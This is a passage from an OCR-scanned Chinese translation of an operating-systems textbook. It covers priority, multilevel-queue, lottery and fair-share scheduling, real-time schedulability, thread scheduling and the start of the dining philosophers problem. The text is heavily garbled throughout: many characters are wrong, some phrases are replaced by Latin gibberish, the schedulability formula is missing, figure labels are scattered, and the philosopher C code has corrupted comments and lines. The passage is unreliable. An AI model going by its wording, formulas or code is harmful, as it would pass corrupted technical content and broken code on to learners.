学 生 。 这 种 将 外 部 因素 考虑 在 内 的 需要 就 导 致 了 优先 级 调度 。 
基本 思想 很 清楚 : 每 个 进程 被 赋予 一 个 优先 级 ， 人 允许 优先 级 最 高 的 
进 
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一 些 更 重要 。 例 如 ， 与 在 屏幕 上 实时 显示 视频 电影 的 进程 相 比 ， 在 后 
台 发 送 电子 邮件 的 守护 进程 应 该 被 赋予 较 低 的 优 移 级 。 


为 了 防止 高 优先 级 进程 无 休止 地 运行 下 去 ， 调 度 程序 可 以 在 每 个 
时 钟 滴 答 ( 即 每 个 时 钟 中 断 ) 降低 当前 进程 的 优先 级 。 如 果 这 个 动作 
导致 该 进程 的 优先 级 低 于 次 高 优先 级 的 进程 ， 则 进行 进程 切换 。 一 个 
可 采用 的 方法 是 ， 每 个 进程 可 以 被 赋予 一 个 允许 运行 的 最 大 时 间 片 ， 
当 这 个 时 间 厂 用 完 时 ， 下 一 个 次 高 优先 级 的 进程 获得 机 会 运行 。 


优先 级 可 以 是 静态 赋予 或 动态 赋予 。 在 一 台 军 用 计算 机 上 ， 可 以 
把 将 军 所 启动 的 进程 设 为 优先 级 100， 上 校 为 90， 人 少校 为 80， 上 尉 为 
70， 中 尉 为 0， 以 此 类 推 。 或 者 ， 在 一 个 商业 计算 中 心 ， 高 优先 级 作 
业 每 小 时 费用 为 100 美 元 ， 中 优先 级 每 小 时 75 美 元 ， 低 优先 级 每 小 时 50 
美元 。UNIX 系 统 中 有 一 条 命令 nice， 它 允许 用 户 为 了 照顾 别人 而 自愿 
降低 自己 进程 的 优先 级 。 但 从 未 有 人 用 过 它 。 


为 达到 茶 种 目的 ， 优 先 级 也 可 以 由 系统 动态 确定 。 例 如 ， 有 些 进 
程 为 /O 密 集 型 ， 其 多 数 时 间 用 来 等 待 WO 结 束 。 当 这 样 的 进程 需要 CPU 
时 ， 应 立即 分 配给 它 CPU， 以 便 局 动 下 一 个 W/O 请 求 ， 这 样 束 可 以 在 男 
一 个 进程 计算 的 同时 执行 VO 操作 。 使 这 类 1/O 密 集 型 进程 长 时 间 等 待 
CPU 只 会 造成 它 无 谓 地 长 时 间 占 用 内 存 。 使 VO 密集 型 进程 获得 较 好 服 
务 的 一 种 简单 算法 是 ， 将 其 优先 级 设 为 Lf，f{ 为 该 进程 在 上 一 时 间 片 中 
所 占 的 部 分 。 一 个 在 其 50ms 的 时 间 刻 中 只 使 用 1ms 的 进程 将 获得 优先 级 
50， 而 在 阻塞 之 前 用 掉 25ms 的 进程 将 具有 优先 级 2， 而 使 用 掉 全 部 时 间 
片 的 进程 将 得 到 优先 级 1。 


可 以 很 方便 地 将 一 组 进程 按 优先 级 分 成 若干 类 ， 并 且 在 各 类 之 间 
采用 优先 级 调度 ， 而 在 各 类 进程 的 内 部 采用 轮转 调度 。 图 2-42 给 出 了 一 
个 有 4 类 优先 级 的 系统 ， 其 调度 算法 如 下 :只 要 存在 优先 级 为 第 4 类 的 
可 运行 进程 ， 就 按照 轮转 法 为 每 个 进程 运行 一 个 时 间 片 ， 此 时 不 理会 
较 低 优先 级 的 进程 。 奉 第 4 类 进程 为 空 ， 则 按照 轮转 法 运行 第 3 类 进 
程 。 厦 第 4 类 和 第 3 类 均 为 空 ， 则 按 轮转 法 运行 第 2 类 进程 。 如 来 不 侦 尔 
对 优先 级 进行 调整 ， 则 低 优先 级 进程 很 可 能 会 产生 饥饿 现象 。 


队列 头 可 运行 进程 


优先 级 3 
(最 低 优先 级 ) 


图 2-42 有 4 个 优先 级 类 的 调度 算法 
3. 多 级 队列 


CTSS (Compatible TimeSharing System) ，M.I 工 在 IBM 7094 上 开 
发 的 兼容 分 时 系统 (Corbato A, 1962) ， 是 最 早 使 用 优先 级 调度 的 
系统 之 一 。 但 是 在 CTSS 中 存在 进程 切换 速度 太 慢 的 问题 ， 其 原因 是 
IBM 7094 内 存 中 只 能 放 进 一 个 进程 ， 每 次 切换 都 需要 将 当前 进程 换 出 
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为 CPU 密集 型 进程 设置 较 长 的 时 间 片 比 频 迷 地 分 给 它们 很 短 的 时 间 片 
要 更 为 高 效 (减少 交换 次 数 ) 。 另 一 方面 ， 如 前 所 述 ， 长 时 间 片 的 进 
程 又 会 影响 到 啊 应 时 间 ， 其 解决 办 法 是 设立 优先 级 类 。 属 于 最 高 优 移 
级 类 的 进程 运行 一 个 时 间 片 ， 属 于 次 高 优先 级 类 的 进程 运行 2 个 时 间 
片 ， 再 次 一 级 运行 4 个 时 间 族 ， 以 此 类 推 。 当 一 个 进程 用 完 分 配 的 时 间 
Fria, ERE R—-R 


作为 一 个 例子 ， 考 虑 有 一 个 进程 需要 连续 计算 100 个 时 间 片 。 它 最 
初 被 分 配 1 个 时 间 片 ， 然 后 被 换 出 。 下 次 它 将 获得 2 个 时 间 片 ， 接 下 来 
分 别 是 4、8、16、32 和 64。 当然 最 后 一 次 它 只 使 用 64 个 时 间 片 中 的 37 
个 便 可 以 结束 工作 。 该 进程 需要 7 次 交换 (BERRA) ， 而 如 果 
采用 纯粹 的 轮转 算法 则 需要 100 次 交换 。 而 且 ， 随 着 进程 优先 级 的 不 断 
降低 ， 它 的 运行 频 度 逐 渐 放 慢 ， 从 而 为 短 的 交互 进程 让 出 CPU 。 


对 于 那些 刚 开始 运行 一 段 长 时 间 ， 而 后 来 又 需要 交互 的 进程 ， 为 
了 防止 其 永远 处 于 被 您 天 状 态 ， 可 以 采取 下 面 的 策略 。 只 要 终端 上 有 
回 车 键 (Enter 键 ) 按 下 ， 则 属于 该 终端 的 所 有 进程 就 都 被 移 到 最 高 优 
先 级 ， 这 样 做 的 原因 是 假设 此 时 进程 即将 需要 交互 。 但 可 能 有 一 天 ， 
一 合 CPU 密 集 的 重 载 机 器 上 有 几 个 用 户 偶然 发 现 ， 只 需 坐 在 那里 随机 
地 每 隔 几 秒 钟 融 一 下 回 车 链 束 可 以 大 大 提高 啊 应 时 间 。 于 十 他 叉 告 诉 


所 有 的 朋友 ..……... 这 个 故事 的 语意 是 :在 实践 上 可 行 比 理论 上 可 行 要 困 


难得 多 。 


已 经 有 许多 其 他 算法 可 用 来 对 进程 划分 优先 级 类 。 例 如 ， 在 伯 殉 
利 制造 的 著名 的 XDS 940 系 统 中 (Lampson, 1968) ， 有 4 个 优先 级 
类 ， 分 别 是 终端 、VO、 短 时 间 片 和 长 时 间 片 。 当 一 个 一 直 等 待 终端 输 
入 的 进程 最 终 被 唤醒 时 ， 它 被 转 到 最 高 优先 级 类 (终端 。 当 等 待 磁 
盘 块 数据 的 一 个 进程 就 绪 时 ， 将 它 转 到 第 2 类 。 当 进程 在 时 间 片 用 完 时 
仍 为 融 绪 时 ， 它 一 般 被 放 入 第 3 类 。 但 如 果 一 个 进程 已 经 多 次 用 完 时 间 
片 而 从 未 因 终 端 或 其 他 MO 原因 阻塞 ， 那 么 它 将 被 转 入 最 低 优先 级 类 。 
许多 其 他 系统 也 使 用 类 似 的 算法 ， 用 以 讨好 交互 用 户 和 进程 ， 而 不 异 
牺牲 后 台 进 程 。 


4. 最 短 进程 优先 


对 于 批 处 理 系统 而 言 ， 由 于 最 短 作 业 优先 钊 第 伴 随 痢 最 短 啊 应 时 
间 ， 所 以 如 果 能 够 把 它 用 于 交互 进程 ， 那 将 是 非常 好 的 。 在 某 种 程度 
上 ， 的 确 可 以 做 到 这 一 点 。 交 互 进程 通常 革 循 下 列 模 式 ， 等 行 售 令 、 
执行 命令 、 等 行 命令 、 执 行 命令 ， 如 此 不 断 反 复 。 如 采 我 们 将 每 一 条 
命令 的 执行 看 作 是 一 个 独立 的 “作业 ”， 则 我 们 可 以 通过 首先 运行 最 短 
的 作业 来 使 啊 应 时 间 最 短 。 这 里 惟一 的 问题 是 如 何 从 当前 可 运行 进程 
中 找 出 最 短 的 那 一 个 进程 。 
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最 短 的 那 一 个 。 假 设 某 个 终端 上 每 条 命令 的 售 计 运行 时 间 为 To。 现 在 
假设 测量 到 其 下 一 次 运行 时 间 为 Ti 。 可 以 用 这 两 个 值 的 加 权 和 来 改进 
估计 时 间 ， 即 aTo +(1-a)T1。 通 过 远 择 a 的 值 ， 可 以 决定 是 尽快 起 挥 老 的 
运行 时 间 ， 还 是 在 一 段 长 时 间 内 始终 记 住 它们 。 当 a=1/2 时 ， 可 以 得 到 
如 下 序列 : 


To, To/2+T1 /2, To /44+T, /4+T, /2, To /8+T, /8+T, /4+Ts /2 


可 以 看 到 ， 在 三 轮 过 后 ，To 在 新 的 估计 值 中 所 占 的 比重 下 降 到 
1/8 ° 


有 了 时 把 这 种 通过 当前 测量 值 和 先前 估计 值 进行 加 权 平 均 而 得 到 下 
一 个 估计 值 的 技术 称 作 老化 aging) 。 它 适用 于 许多 预测 值 必须 基于 
先前 值 的 情况 。 老 化 算法 在 a=1/2 时 特别 容易 实现 ， 只 需 将 新 值 加 到 当 
前 估计 值 上 ， 然 后 除 以 2 〈 即 右 移 一 位 ) 。 


5. 保 证 调度 


一 种 完全 不 同 的 调度 算法 是 向 用 户 作 出 明确 的 性 能 保证 ， 然 后 去 
实现 它 。 一 种 很 实际 并 很 容易 实现 的 保证 是 : AAP LEN Ant AP 
登录 ， 则 用 户 将 获得 CPU 处 理 能 力 的 Vn。 类似 地 ， 在 一 个 有 n 个 进程 运 
行 的 单 用 户 系统 中 ， 若 所 有 的 进程 都 等 价 ， 则 每 个 进程 将 获得 1/n 的 
CPU 时 间 。 看 上 去 足够 公平 了 。 


为 了 实现 所 做 的 保证 ， 系 统 必须 跟踪 各 个 进程 自 创 建 以 来 已 使 用 
了 多 少 CPU 时 间 。 然 后 它 计算 各 个 进程 应 获得 的 CPU 时 间 ， 即 目 创建 
以 来 的 时 间 除 以 n。 由 于 各 个 进程 实际 获得 的 CPU 时 间 是 已 知 的 ， 所 以 
很 容易 计算 出 真正 获得 的 CPU 时 间 和 应 获得 的 CPU 时 间 之 比 。 比 率 为 
0.5 说 明 一 个 进程 只 获得 了 应 得 时 间 的 一 半 ， 而 比率 为 2.0 则 说 明 它 获得 
了 应 得 时 间 的 2 倍 。 于 是 该 算法 随后 转向 比率 最 低 的 进程 ， 直 到 该 进程 
的 比率 超过 它 的 最 接近 竞争 者 为 止 。 


6. 彩 票 调 度 


给 用 户 一 个 保证， 然后 部 现 之 ， 这 是 个 好 想法 ， 不 过 很 难 实现 。 
但 是 ， 有 一 个 既 可 给 出 类 似 预测 结 采 而 义 有 非常 简单 的 实现 方法 的 算 
法 ， 这 个 算法 称 为 彩票 调度 (lottery scheduling) (Waldspurger#ll 


Weihl, 1994) 。 


其 基本 思想 是 向 进程 提供 各 种 系统 资源 (如 CPU 时 间 ) 的 彩票 。 
一 旦 需要 做 出 一 项 调度 决策 时 ， 束 随机 抽出 一 张 彩票 ， 拥 有 该 彩票 的 
进程 获得 该 资源 。 在 应 用 到 CPU 调 度 时 ， 系 统 可 以 掌握 每 秒 钟 50 次 的 
一 种 彩票 ， 作 为 奖励 每 个 获奖 着 可 以 得 到 20ms 的 CPU 时 间 。 


为 了 说 明 George Orwell 天 于 “所 有 进程 是 平等 的 ， 但 是 某 些 进程 更 
平等 一 些 * 的 含义 ， 可 以 给 更 重要 的 进程 额外 的 彩票 ， 以 便 增加 它们 获 
胜 的 机 会 。 如 果 出 售 了 100 张 彩票 ， 而 有 一 个 进程 持 有 其 中 的 20 张 ， 那 


么 在 每 一 次 抽奖 中 该 进程 就 有 20% 的 取胜 机 会 。 在 较 长 的 运行 中 ， 该 进 
程 会 得 到 20% 的 CPU。 相 反 ， 对 于 优先 级 调度 程序 ， 很 难说 明 拥 有 优先 
级 40 究 竟 是 什么 意思 ， 而 这 里 的 规则 很 清楚 : 拥有 彩票 {份额 的 进程 大 
约 得 到 系统 资源 的 {份额 。 


彩票 调度 具有 知 干 有 趣 的 性 质 。 例 如 ， 如 果 有 一 个 新 的 进程 出 现 
并 得 到 一 些 彩票 ， 那 么 在 下 一 次 的 抽 交 中 ， 该 进程 会 有 同 它 持 有 彩票 
数量 成 比例 的 机 会 属 得 奖励 。 换 名 话说， 彩票 调度 是 反应 迅速 的 。 


如 琳 布 望 协 作 进程 可 以 交换 它们 的 彩票 。 例 如 ， 有 一 个 客户 进程 
向 服务 器 进程 发 送 消息 后 就 被 阻塞 ， 该 客户 进程 可 以 把 它 所 有 的 彩票 
交 给 服务 历 ， 以 便 增 加 该 服务 万 下 次 运行 的 机 会 。 在 服务 融 运 行 完 成 
之 后 ， 该 服务 右 再 把 彩票 还 给 客户 机 ， 这 样 客户 机 又 可 以 运行 了 。 事 
实 上 ， 如 果 没 有 客户 机 ， 服 务 器 根本 束 不 需要 彩票 。 


彩票 调度 可 以 用 来 解决 用 其 他 方法 很 难 解 决 的 问题 。 一 个 例子 
是 ， 有 一 个 视频 服务 器 ， 在 该 视频 服务 絮 上 若干 进程 正在 向 其 客户 提 
供 视 频 流 ， 每 个 视频 流 的 帧 速率 都 不 相同 。 假 设 这 些 进程 需要 的 帧 速 
率 分 别 是 10、20 和 25 帧 / 秒 。 如 有 果 给 这 些 进 程 分 别 分 配 10、20 和 25 张 彩 
票 ， 那 么 它们 会 自动 地 按照 大 致 正确 的 比例 〈 即 10:20:25) 划分 CPU 的 
使 用 。 


到 现在 为 止 ， 我 们 假设 被 调度 的 都 是 各 个 进程 自身 ， 并 不 关注 其 
所 有 者 是 谁 。 这 样 做 的 结果 是 ， 如 果 用 户 1 启 动 9 个 进程 而 用 户 2 启动 1 
个 进程 ， 使 用 轮转 或 相同 优先 级 调度 算法 ， 那 么 用 户 1 将 得 到 90% 的 
CPU 时 间 ， 而 用 户 2 只 得 到 10% 的 CPU 时 间 。 


为 了 避免 这 种 情形 ， 某 些 系统 在 调度 处 理 之 前 考虑 谁 拥有 进程 这 
一 因素 。 在 这 种 模式 中 ， 每 个 用 户 分 配 到 CPU 时 间 的 一 部 分 ， 而 调度 
程序 以 一 种 强制 的 方式 选择 进程 。 这 样 ， 如 果 两 个 用 户 都 得 到 获得 
50%CPU 时 间 的 保证 ， 那 么 无 论 一 个 用 户 有 多 少 进程 存在 ， 每 个 用 户 都 
会 得 到 应 有 的 CPU 份 额 。 


作为 一 个 例子 ， 考 虑 有 两 个 用 户 的 一 个 系统 ， 每 个 用 户 都 保证 获 
得 50%CPU 时 间 。 用 户 1 有 4 个 进程 A、B、C 和 D， 而 用 户 2 只 有 1 个 进程 
E。 如 果 采 用 轮转 调度 ， 一 个 满足 所 有 限制 条 件 的 可 能 序列 是 : 


AEBECEDEAEBECEDE... 


另 一 方面 ， 如 采用 户 1 得 到 比 用 户 2 两 倍 的 CPU 时 间 ， 我 们 会 有 


ABECDEABECDE... 


当然 ， 大 量 其 他 的 可 能 也 存在 ， 可 以 进一步 探讨 ， 这 取决 于 如 何 
定义 公平 的 含义 。 


24.4 实时 系统 中 的 调度 


实时 系统 是 一 种 时 间 起 着 主导 作用 的 系统 。 典 型 地 ， 外 部 的 一 种 
或 多 种 物理 设备 给 了 计算 机 一 个 刺激 ， 而 计算 机 必须 在 一 个 确定 的 时 
间 范 围 内 恰当 地 做 出 反应 。 例 如 ， 在 CD 播放 右 中 的 计算 机 获得 从 驱动 
妖 而 来 的 位 流 ， 然 后 必须 在 非常 短 的 时 间 间 隔 内 将 位 流转 换 为 音乐 。 
如 采 计 算 时 间 过 长 ， 那 么 音乐 就 会 听 起 来 有 异常 。 其 他 的 实时 系统 例 
子 还 有 ， 医 院 特别 护理 部 门 的 病人 监护 装置 、 飞 机 中 的 目 动 当 驶 系统 
以 及 目 动 化 工厂 中 的 机 器 人 控制 等 。 在 所 有 这 些 例 子 中 ， 正 确 的 但 是 
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实时 系统 通常 可 以 分 为 硬 实时 (hard real time) 和 软 实 时 (soft 
realtime) ， 前 者 的 含义 是 必须 满足 绝对 的 截止 时 间 ， 后 者 的 含义 是 虽 
然 不 布 望 偶尔 错失 截止 时 间 ， 但 是 可 以 容 妨 。 在 这 两 种 情形 中 ， 实 时 
性 能 都 是 通过 把 程序 划分 为 一 组 进程 而 实现 的 ， 其 中 每 个 进程 的 行为 
征 可 预测 和 提前 掌握 的 。 这 些 进 程 一 般 寿 命 较 短 ， 并 且 极 快 地 瓯 运行 
完成 。 在 检测 到 一 个 外 部 信号 时 ， 调 度 程序 的 任务 殉 是 按照 满足 所 有 
截止 时 间 的 要 求 调度 进程 。 


实时 系统 中 的 事件 可 以 按照 啊 应 方式 进一步 分 类 为 周期 性 〈 以 规 
则 的 时 间 间 隅 发 生 ) 事件 或 非 周 期 性 (发 生 时 间 不 可 预知 事件。 一 


个 系统 可 能 要 啊 应 多 个 周期 性 事件 流 。 根 据 每 个 事件 需要 处 理 时 间 的 
长 短 ， 系 统 甚 至 有 可 能 无 法 处 理 完 所 有 的 事件 。 例 如 ， 如 果 有 m 个 周 

期 事件 ， 事 件 i 以 周期 Pi 发 生 ， 并 需要 Ci 秒 CPU 时 间 处 理 一 个 事件 ， 那 
么 可 以 处 理 人 负载 的 条 件 是 


满足 这 个 条 件 的 实时 系统 称 为 是 可 调度 的 。 


作为 一 个 例子 ， 考 虑 一 个 有 三 个 周期 性 事件 的 软 实时 系统 ， 其 周 
期 分 别 是 100ms、200ms 和 500ms。 如 果 这 些 事件 分 别 需 要 50ms、30ms 
和 100 ms 的 CPU 时 间 ， 那 么 该 系统 是 可 调度 的 ， 因 为 0.5+0.15+0.2< 
1° 如 果 有 第 四 个 事件 加 入 ， 其 周期 为 1 秒 ， 那 么 只 要 这 个 事件 是 不 超 
过 每 事件 150ms 的 CPU 时 间 ， 那 么 该 系统 就 仍然 是 可 调度 的 。 在 这 个 
计算 中 隐 含 了 一 个 假设 ， 即 上 下 文 切换 的 开销 很 小 ， 可 以 忽略 不 计 。 


实时 系统 的 调度 算法 可 以 是 静态 或 动态 的 。 前 者 在 系统 开始 运行 
之 前 作出 调度 决策 ， 后 者 在 运行 过 程 中 进行 调度 决策 。 只 有 在 可 以 所 
前 擎 握 所 完成 的 工作 以 及 必须 满足 的 截止 时 间 等 全 部 信息 时 ， 静 态 调 
度 才 能 工作 。 而 动态 调度 算法 不 需要 这 些 限制 。 这 里 我 们 只 涉及 一 些 
特定 的 算法 ， 而 把 实时 多 媒体 系统 留 到 第 7 章 去 讨论 。 


2.4.5 策略 和 机 制 


到 目前 为 止 ， 我们 隐 含 地 假设 系统 中 所 有 进程 分 属 不 同 的 用 户 ， 
并 且 ， 进 程 间 相互 范 争 CPU。 通 常情 况 下 确实 如 此 ， 但 有 时 也 有 这 样 
的 情况 : 一 个 进程 有 许多 子 进程 并 在 其 控制 下 运行 。 例 如 ， 一 个 数据 
库 管 理 系 统 可 能 有 许多 子 进 程 ， 每 一 个 子 进程 可 能 处 理 不 同 的 请 求 ， 
或 每 一 个 子 进程 实现 不 同 的 功能 “如 请 求 分 析 ， 磁 弄 访 问 等 ) 。 主 进 
程 完全 可 能 掌握 哪 一 个 子 进程 最 重要 《或 最 紧迫 ) 而 哪 一 个 最 不 重 
要 。 但 是 ， 以 上 讨论 的 调度 算法 中 没有 一 个 算法 从 用 户 进程 接收 有 关 
的 调度 决策 信息 ， 这 了 束 导 致 了 调度 程序 很 少 能 够 做 出 最 优 的 选择 。 


解决 问题 的 方法 是 将 调度 机 制 (scheduling mechanism) 与 调度 策 
HS (scheduling policy) 分 离 (著名 的 原则 ，Levin 等 人 ，1975) , toa 
是 将 调度 算法 以 某 种 形式 参数 化 ， 而 参数 可 以 由 用 户 进程 填写 。 我 们 
再 来 看 一 下 数据 库 的 例子 。 假 设 内 核 使 用 优先 级 调度 算法 ， 但 提供 一 
条 可 供 进程 设置 (并 改变 ) 优先 级 的 系统 调用 。 这 样 ， 尽 管 父 进程 本 
身 并 不 参与 调度 ， 但 它 可 以 控制 如 何 调度 子 进程 的 细节 。 在 这 里 ， 调 
度 机 制 位 于 内 核 ， 而 调度 策略 则 由 用 户 进程 决定 。 


2.46 ”线程 调度 


当 寿 干 进 程 都 有 多 个 线程 时 ， 束 存在 两 个 层次 的 并 行 : 进程 和 线 
程 。 在 这 样 的 系统 中 调度 处 理 有 本 质 差别 ， 这 取决 于 所 文 持 的 是 用 户 
级 线程 还 是 内 核 级 线程 〈 或 两 者 都 文 持 ) 。 


首先 考虑 用 户 级 线程 。 由 于 内 核 并 不 知道 有 线程 存在 ， 所 以 内 核 
还 征 和 以 前 一 样 地 操作 ， 选 取 一 个 进程 ， 假 设 为 A， 并 给 予 A 以 时 间 片 
控制 。A 中 的 线程 调度 程序 决定 哪个 线程 运行 ， 假 设 为 A1。 由 于 多 道 
线程 并 不 存在 时 钟 中 断 ， 所 以 这 个 线程 可 以 按 其 意愿 任意 运行 多 长 时 
间 。 如 果 该 线程 用 完了 进程 的 全 部 时 间 片 ， 内 核 就 会 选择 另 一 个 进程 


在 进程 A 终于 又 一 次 运行 时 ， 线 程 A1 会 接着 运行 。 该 线程 会 继续 
耗费 A 进程 的 所 有 时 间 ， 直 到 它 完 成 工作 。 不 过 ， 该 线程 的 这 种 不 合群 
和 行为 不 会 影响 到 其 他 的 进程 。 其 他 进程 会 得 到 调度 程序 所 分 配 的 合 
适 份额 ， 不 会 考虑 进程 A 内 部 所 发 生 的 事 。 


oO} 


现在 考虑 A 线 程 每 次 CPU 计算 的 工作 比较 少 的 情况 ， 例 如 ， 在 50mas 
的 时 间 片 中 有 5ms 的 计算 工作 。 于 是 ， 每 个 线程 运行 一 会 儿 ， 然 后 把 
CPU 交 回 给 线程 调度 程序 。 这 样 在 内 核 切 换 到 进程 B 之 前 ， 就 会 有 序列 


Al, A2, A3, Al, A2, A3, Al, A2, A3, 


43a 表 示 。 


线程 运行 进程 B 


的 顺序 


2. 运行 时 系统 选 
取 一 个 线程 


1. 内 核 选 取 一 个 进程 


A1, A2, A3, A1, A2, A3 
At, Bt, A2, B2, A3, B3 


可 能 : 
不 可 能 : 
a) 


图 2-43 ” a) 用户 级 线程 的 可 能 调度 


Al1。 这 种 情形 可 用 图 2- 


进程 A 


进程 B 


1. 内 核 选取 一 个 线程 B 


A1, A2, A3, A1, A2, A3 
A1, B1, A2, B2, A3, B3 


b) 


可 能 : 


' 也 可 能 : 


， 有 50ms 时 间 搬 的 进程 以 及 每 次 运 


行 5ms CPU 的 线程 ，b) 与 9 有 相同 特性 的 内 核 级 线程 的 可 能 调度 


实时 系统 使 用 的 调度 算法 可 以 是 上 面 介 绍 的 算法 中 的 任意 一 种 。 
从 实用 考虑 ， 轮 转调 度 和 优 移 级 调度 更 为 党 用。 惟一 的 局 限 是 ， 缺 乏 
一 个 时 钟 将 运行 过 长 的 线程 加 以 中 断 。 


现在 考虑 使 用 内 核 级 线程 的 情形 
行 。 它 不 用 考虑 该 线程 属于 哪个 进程 


o 内 核 选择 一 个 特定 的 线程 运 
， 不 过 如 采 有 必要 的 话 ， 它 可 以 


这 样 做 。 对 被 选择 的 线程 赋予 一 个 时 间 片 ， 而 且 如 果 超 过 了 时 间 片 ， 
就 会 强制 挂 起 该 线程 。 一 个 线程 在 50ms 的 时 间 片 内 ，5ms 之 后 被 阻塞 ， 
在 30ms 的 时 间 段 中 ， 线 程 的 顺序 会 是 AL1，B1，A2，B2，A3，B3， 在 


这 种 参数 和 用 户 线程 状态 下 ， 有 些 情形 是 不 可 能 出 现 的 。 这 种 情形 部 
分 通过 图 2-43b 刻 画 。 


用 户 级 线程 和 内 核 级 线程 之 间 的 老 别 在 于 性 能 。 用 户 级 线程 的 线 
程 切换 需要 少量 的 机 器 指令 ， 而 内 核 级 线程 需要 完整 的 上 下 文 切换 ， 
修改 内 存 映像 ， 使 高 速 缓 存 失效 ， 这 导致 了 大 和 干 数量 级 的 延迟 。 男 一 
方面 ， 在 使 用 内 核 级 线程 时 ， 一 旦 线程 阻塞 在 WO 上 就 不 需要 像 在 用 户 
级 线程 中 那样 将 整个 进程 挂 起 。 


从 进程 A 的 一 个 线程 切换 到 进程 B 的 一 个 线程 ， 其 代价 高 于 运行 进 
程 A 的 第 2 个 线程 〈 因 为 必须 修改 内 存 映像 ， 清 除 内 存 高 速 缓存 的 内 
容 ) ， 内 核对 此 是 了 解 的 ， 并 可 运用 这 些 信 息 做 出 决定 。 例 如 ， 给 定 
两 个 在 其 他 方面 同等 重要 的 线程 ， 其 中 一 个 线程 与 刚好 阻塞 的 线程 属 
于 同一 个 进程 ， 而 另 一 个 线程 属于 其 他 的 进程 ， 那 么 应 该 倾 癌 前 着 。 


另 一 个 重要 因素 是 用 户 级 线程 可 以 使 用 专 为 应 用 程序 定制 的 线程 
调度 程序 。 例 如 ， 考 虑 图 2-8 中 的 Web 服 务 器 。 假 设 一 个 工作 线程 刚刚 
被 阻塞 ， 而 分 派 线 程 和 为 外 两 个 工作 线程 是 束 绪 的 。 那 么 应 该 运行 哪 
一 个 呢 ? 由 于 运行 系统 了 解 所 有 线程 的 作用 ， 所 以 会 直接 选择 分 派 线 
程 接着 运行 ， 这 样 分 派 线 程 束 会 局 动 另 一 个 工作 线程 运行 。 在 一 个 工 
作 线 程 经 常 阻塞 在 磁 副 IO 上 的 环境 中 ， 这 个 策略 将 并 行 度 最 大 化 。 而 
在 内 核 级 线程 中 ， 内 核 从 来 不 了 解 每 个 线程 的 作用 (虽然 它们 被 赋予 


了 不 同 的 优先 级 ) 。 不 过 ， 一 般 而 言 ， 应 用 定制 的 线程 调度 程序 能 够 
比 内 核 更 好 地 满足 应 用 的 需要 。 


2.5 经 典 的 IPC 问 题 


操作 系统 文献 中 有 许多 广 为 讨 论 和 分 析 的 有 趣 问 题 ， 它 们 与 同步 
方法 的 使 用 相关 。 以 下 几 市 我 们 将 讨论 其 中 两 个 最 著名 的 问题 。 


2.5.1 AeA Al el 


1965 年 ，Dijkstra 提 出 并 解决 了 一 个 他 称 之 为 哲学 家 就 餐 的 同步 问 
题 。 从 那 时 起 ， 每 个 发 明 新 的 同步 原 语 的 人 都 希望 通过 解决 哲学 家 了 就 
餐 问 题 来 展示 其 同步 原 语 的 精妙 之 处 。 这 个 问题 可 以 简单 地 描述 如 
下 : 五 个 哲学 家 围 坐 在 一 张 圆桌 周围 ， 每 个 哲学 家 面前 都 有 一 盘 通 心 
粉 。 由 于 通 心 粉 很 消 ， 所 以 需要 两 把 义 子 才 能 夹 住 。 相 邻 两 个 盘子 之 
间 放 有 一 把 久子 ， 和 餐桌 如 图 2-44 所 示 。 
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图 2-44 哲学 家 的 午餐 时 间 


哲学 家 的 生活 中 有 两 种 交替 活动 时 段 : 即 吃饭 和 思考 (这 只 是 
种 抽象 ， 即 对 哲学 家 而 言 其 他 活动 都 无 关 紧 要 ) 。 当 一 个 哲学 家 觉得 
俄 了 时 ， 他 就 试图 分 两 次 去 取 其 左边 和 右边 的 又 子 ， 每 次 拿 
不 分 次 序 。 如 果 成 功 地 得 到 了 两 把 义 子 ， 就 开始 吃饭 ， 吃 完 后 放下 叉 
子 继续 思考 。 关 键 问 题 是 : 能 为 每 一 个 哲学 家 写 一 段 描述 其 
序 ， 且 决 不 会 死 锁 吗 ? 《要 求 拿 两 把 又 子 是 人 为 规定 的 ， 我 们 也 可 以 
将 意大利 面条 换 成 中 国 菜 ， 用 米饭 代替 通 心 粉 ， 用 筷子 代替 又 子 。) 


图 2-45 给 出 了 一 种 直观 的 解法 。 过 程 take_fork 将 一 直 等 到 所 指定 的 
义 于 可 用 ， 然 后 将 其 取 用 。 不 过 ， 这 种 显然 的 解法 是 错误 的 。 如 末了 五 
位 哲学 家 同时 拿 起 左面 的 又 子 ， 束 没有 人 能 够 拿 到 他 们 右面 的 又 子 ， 
于 是 发 生死 锁 。 


#define N 5 /# 哲学 家 的 数目 */ 


void philosopher(int i) /* i: 哲学 家 编号 ， 从 0 到 4 */ 
{ 


wae ca MERE 4 
take_fork(i); 证 拿 起 左边 叉子 */ 
take_fork((i+1) % N); /* PRAWNS, DERBH. */ 
eat( ); 六 进食 */ 
put_fork(i): 上 将 左 叉 放 回 桌 上 */ 
put_fork((i+1) % N); 上/# 将 右 叉 放 回 果 上 */ 


图 2-45 哲学 家 就 餐 问 题 的 一 种 错误 解法 


我 们 可 以 将 这 个 程序 修改 一 下 ， 这 样 在 拿 到 左 义 后 ， 程 序 要 查看 
右面 的 又 子 是 否 可 用 。 如 采 不 可 用 ， 则 该 哲学 家 移 放 下 雹 又， 等 一 段 
时 间 ， 再 重复 整个 过 程 。 但 这 种 解法 也 是 错误 的 ， 尺 管 与 前 一 种 原因 
不 同 。 可 能 在 某 一 个 瞬间 ， 所 有 的 哲学 家 都 同时 开始 这 个 算法 ， 拿 起 
其 左 又 ， 看 到 右 又 不 可 用 ， 又 都 放下 左 又 ， 等 一 会 儿 ， 又 同时 拿 起 左 
又 ， 如 此 这 样 永远 重复 下 去 。 对 于 这 种 情况 ， 所 有 的 程序 都 在 不 俘 地 
运行 ， 但 都 无 法 取得 进展 ， 就 称 为 饥饿 (starvation) 。 (即使 问题 不 
发 生 在 意大利 餐馆 或 中 国 餐 迄 ， 也 被 称 为 饥饿 。) 


现在 读者 可 能 会 想 , “如 果 哲 学 家 在 拿 不 到 右边 叉子 时 等 竺 一 段 随 
机 时 间 ， 而 不 是 等 竺 相同 的 时 间 ， 这 样 发 生 互 锁 的 可 能 性 区 很 小 了 ， 
事情 就 可 以 继续 了 。” 这 种 想法 是 对 的 ， 而 且 在 几乎 所 有 的 应 用 程序 
中 ， 稍 后 再 试 的 办 法 并 不 会 演化 成 为 一 个 问题 。 例 如 ， 在 流行 的 局 域 
网 以 太 网 中 ， 如 采 两 台 计 算 机 同时 发 送 包 ， 那 么 每 台 计 算 机 等 待 一 段 
随机 时 间 之 后 再 尝试 。 在 实践 中 ， 该 方案 工作 良好 。 但 是 ， 在 少数 的 
